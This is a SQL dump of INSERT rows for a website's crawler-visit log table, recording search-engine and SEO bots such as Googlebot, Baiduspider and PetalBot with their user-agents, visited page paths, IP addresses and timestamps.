INSERT INTO `ey_weapp_spider_visit` VALUES ('97719', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zy.html', '114.119.151.153', '1661867150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97725', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/tags/3.html', '17.121.114.253', '1661868236', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98044', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/446.html', '114.119.151.155', '1662012331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98262', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662111646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98054', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/128.html', '17.121.115.161', '1662016545', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97724', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/92.html', '114.119.151.153', '1661868045', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97723', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/tags/2.html', '17.121.113.80', '1661867716', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97738', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/202.html', '66.249.79.112', '1661875536', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97824', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_32/', '185.191.171.19', '1661901515', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97912', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/53.html', '66.249.79.108', '1661941668', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97711', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nys.html', '114.119.151.153', '1661863953', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97712', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/70.html', '116.179.32.91', '1661864833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97714', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/365.html', '185.191.171.9', '1661865283', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97713', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/longnan.html', '114.119.151.155', '1661864881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97717', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/17.html', '114.119.151.155', '1661866599', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97750', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/9.html', '66.249.79.108', '1661886075', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97715', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_22/', '185.191.171.35', '1661865374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97705', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/348.html', '220.181.108.147', '1661859924', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97709', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/296.html', '114.119.151.153', '1661863681', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97704', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/296.html', '216.244.66.194', '1661859872', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98047', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/118.html', '114.119.151.155', '1662012662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98053', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/198.html', '220.181.108.111', '1662016127', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98129', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/499.html', '185.191.171.24', '1662053042', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97699', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/61.html', '185.191.171.5', '1661856153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97710', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/312.html', '66.249.79.110', '1661863737', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97754', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.112', '1661886676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98112', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/138.html', '114.119.151.155', '1662044897', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98113', '4', 'mozilla/5.0 (iphone; cpu iphone os 11_0 like mac os x) applewebkit/604.1.34 (khtml, like gecko) version/11.0 mobile/15a5341f safari/604.1;360spider', '/news/165.html', '42.236.10.91', '1662045404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97686', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/buliaoji', '185.191.171.25', '1661847986', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97831', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/286.html', '216.244.66.194', '1661905940', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97669', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_10.html', '185.191.171.18', '1661838363', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98061', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.153', '1662025431', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98250', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/366.html', '114.119.151.155', '1662109803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98426', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/62.html', '162.55.86.60', '1662194901', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97666', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/127.html', '114.119.151.155', '1661837872', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97833', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/95.html', '216.244.66.194', '1661906206', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98060', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.18', '1662024270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97790', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/106.html', '66.249.79.110', '1661893551', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97655', '4', 'mozilla/5.0 (iphone; cpu iphone os 11_0 like mac os x) applewebkit/604.1.34 (khtml, like gecko) version/11.0 mobile/15a5341f safari/604.1;360spider', '/', '42.236.10.74', '1661835454', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97772', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/299.html', '116.179.32.33', '1661889378', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97773', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/267.html', '66.249.79.110', '1661889746', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97899', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.206', '1661936561', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97902', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zjs.html', '114.119.151.153', '1661938110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98102', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/66.html', '114.119.151.155', '1662042202', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97861', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/316.html', '185.191.171.25', '1661913975', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97792', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/67.html', '66.249.79.108', '1661893616', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97791', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/17.html', '66.249.79.108', '1661893594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97775', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/154.html', '185.191.171.25', '1661890372', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97776', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/124.html', '66.249.79.108', '1661890379', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97789', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.108', '1661893486', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97865', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/231.html', '185.191.171.24', '1661918356', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97864', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/394.html', '185.191.171.38', '1661918087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97657', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.89', '1661836129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97872', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/419.html', '66.249.79.108', '1661922487', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97661', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/233.html', '114.119.151.153', '1661836531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97658', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/165.html', '42.236.10.113', '1661836160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97659', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/145.html', '114.119.151.155', '1661836264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97837', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/chezaibengal/', '17.121.115.210', '1661908128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97654', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bbs.html', '114.119.151.155', '1661835442', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97646', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/146.html', '185.191.171.18', '1661832960', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97647', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/57.html', '185.191.171.38', '1661833182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97648', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.108', '1661833434', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97701', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_25/', '185.191.171.17', '1661856996', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98420', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/55.html', '162.55.86.60', '1662194714', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97766', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/17.html', '66.249.79.110', '1661887753', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98422', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/57.html', '162.55.86.60', '1662194776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97682', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661843974', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97684', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/32.html', '116.179.32.140', '1661844480', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97673', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_2.html', '185.191.171.2', '1661839884', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97671', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/364.html', '114.119.151.155', '1661838956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98425', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/61.html', '162.55.86.60', '1662194870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97665', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/184_2.html', '185.191.171.43', '1661837478', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97696', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/298.html', '114.119.151.153', '1661854504', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97694', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_14.html', '185.191.171.40', '1661854218', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97702', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_5/', '185.191.171.25', '1661858916', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97643', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/tbxw/', '157.55.39.153', '1661832513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97771', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/359.html', '66.249.79.112', '1661889050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97641', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/91.html', '185.191.171.17', '1661830985', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97832', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '118.169.150.75', '1661906122', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97798', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661894540', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97664', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/408.html', '114.119.151.155', '1661837070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97801', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/173.html', '66.249.79.112', '1661894918', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97799', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.110', '1661894594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97782', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/106.html', '66.249.79.108', '1661892147', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97783', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/109.html', '66.249.79.108', '1661892233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97779', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/67.html', '66.249.79.112', '1661891067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97780', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.110', '1661891759', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97778', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/167.html', '66.249.79.108', '1661890765', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97644', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/382.html', '207.46.13.213', '1661832640', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97645', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/345.html', '185.191.171.3', '1661832861', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97843', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/21.html', '114.119.151.155', '1661910024', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97816', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.108', '1661897424', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98445', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/203.html', '162.55.86.60', '1662195462', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97640', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/230.html', '66.249.79.110', '1661830738', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97842', '99', 'mozilla/5.0 (compatible;petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.155', '1661909803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97633', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_43/', '216.244.66.194', '1661825593', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97653', '4', 'mozilla/5.0 (iphone; cpu iphone os 11_0 like mac os x) applewebkit/604.1.34 (khtml, like gecko) version/11.0 mobile/15a5341f safari/604.1;360spider', '/news/451.html', '42.236.10.77', '1661835425', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97819', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.56', '1661898114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97821', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/198.html', '185.191.171.3', '1661900525', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97681', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/199.html', '116.179.32.40', '1661843021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97667', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/97.html', '114.119.151.153', '1661838140', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97627', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.110', '1661821004', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97628', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_62/', '185.191.171.9', '1661821703', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97629', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1661822974', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97777', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.108', '1661890474', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97634', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.107', '1661825637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97817', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/126.html', '66.249.79.110', '1661898007', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97670', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yunan.html', '114.119.151.155', '1661838426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97815', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.110', '1661897402', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98444', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/202.html', '162.55.86.60', '1662195431', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97818', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/227.html', '66.249.79.110', '1661898106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97806', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_9.html', '185.191.171.26', '1661895491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97807', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/215.html', '66.249.79.112', '1661895739', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97595', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/191.html', '185.191.171.26', '1661807646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97596', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/202.html', '114.119.151.153', '1661808201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98428', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/64.html', '162.55.86.60', '1662194964', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97679', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/309.html', '220.181.108.178', '1661841032', '0');
